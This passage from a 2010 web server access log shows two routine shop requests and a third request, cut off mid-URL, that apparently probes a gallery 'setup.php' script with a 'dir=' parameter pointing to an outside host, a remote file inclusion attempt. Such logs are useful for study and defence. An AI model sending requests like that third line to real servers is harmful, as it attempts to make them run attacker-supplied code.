173.71.47.215 - - [23/Feb/2010:04:54:36 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LL233C15831C60800C2E3079+M37+ENG HTTP/1.1" 200 36405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; Media Center PC 5.0; SLCC1)"
173.71.47.215 - - [23/Feb/2010:04:54:42 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LL233C15A30F63800D5E3079+M37+ENG HTTP/1.1" 200 36824 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LL233C15831C60800C2E3079+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 3.0.30618; Media Center PC 5.0; SLCC1)"
200.93.147.154 - - [23/Feb/2010:04:54:42 -0500] "GET /logs/access_log.Q109102900///skin/dongnara_gallery/setup.php?dir=http://zerozon.co.kr/da